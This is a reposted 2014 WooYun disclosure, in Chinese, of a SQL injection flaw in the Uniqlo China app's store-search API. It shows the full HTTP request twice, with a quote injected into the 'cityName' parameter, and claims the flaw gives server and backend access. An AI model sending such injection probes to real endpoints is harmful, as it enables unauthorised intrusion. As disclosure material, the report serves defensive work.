[公开漏洞]优衣库APP手机端接口注射漏洞导致服务器入侵

    来源:WooYun 浏览:1123次 时间:2014-05-13
优衣库APP手机端接口注射漏洞导致服务器入侵 相关厂商: 优衣库 漏洞作者:w5r2 提交时间:2014-02-11 16:41 公开时间:2014-05-12 16:41 漏洞类型:用户敏感数据泄漏 危害等级:高 自评Rank:20 漏洞状态: 未联系到厂商或者厂商积极忽略 漏洞来源:http://www.wooyun.org Tags标签: 手机应用 手机安全 敏感数据未加密 手机软件安全 漏洞详情 披露状态:

2014-02-11:积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-12:厂商已经主动忽略漏洞,细节向公众公开

简要描述:

APP 造成注入服务器被入侵,建议修复漏洞。

详细说明: 

POST /mcms/index.php/storeHome/axisRight HTTP/1.1

Host: event.uniqlo.cn

User-Agent: 优衣库 2.0.1 (iPhone; iPhone OS 7.0.4; zh_CN)

Accept-Encoding: gzip

osversition: 7.0.4

subSourceId: UnqAppstoreI1

carrier: 

platform: iphone

Content-Type: application/x-www-form-urlencoded; charset=utf-8

macAddress: 295FA85D-292B-47A9-A451-68D2E802D921

protocolVer: 3.2

Connection: close

model: N94AP

sourceId: UnqAppstoreI1

weblogid: 

Proxy-Connection: close

Content-Length: 84

clientVer: 2.0.1

screenSize: 640x960



cityName=%E5%8C%97%E4%BA%AC%E5%B8%82'&isHotShop=0&keyword=&latitude=&longitude=&num=5





cityName keyword 注入导致服务器进入后台



QQ截图20140211163611.png

QQ截图20140211163552.png

<

漏洞证明: 

POST /mcms/index.php/storeHome/axisRight HTTP/1.1

Host: event.uniqlo.cn

User-Agent: 优衣库 2.0.1 (iPhone; iPhone OS 7.0.4; zh_CN)

Accept-Encoding: gzip

osversition: 7.0.4

subSourceId: UnqAppstoreI1

carrier: 

platform: iphone

Content-Type: application/x-www-form-urlencoded; charset=utf-8

macAddress: 295FA85D-292B-47A9-A451-68D2E802D921

protocolVer: 3.2

Connection: close

model: N94AP

sourceId: UnqAppstoreI1

weblogid: 

Proxy-Connection: close

Content-Length: 84

clientVer: 2.0.1

screenSize: 640x960



cityName=%E5%8C%97%E4%BA%AC%E5%B8%82'&isHotShop=0&keyword=&latitude=&longitude=&num=5





cityName keyword 注入导致服务器进入后台



QQ截图20140211163611.png

QQ截图20140211163552.png

<

修复方案:

修复把

版权声明:转载请注明来源 w5r2@乌云 漏洞回应 厂商回应:

未能联系到厂商或者厂商积极拒绝

上一篇: 酷狗音乐 7.5.90 VIP绿色 单文件版下载
下一篇: 城市热点任意下载漏洞+不安全因素+弱口令下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细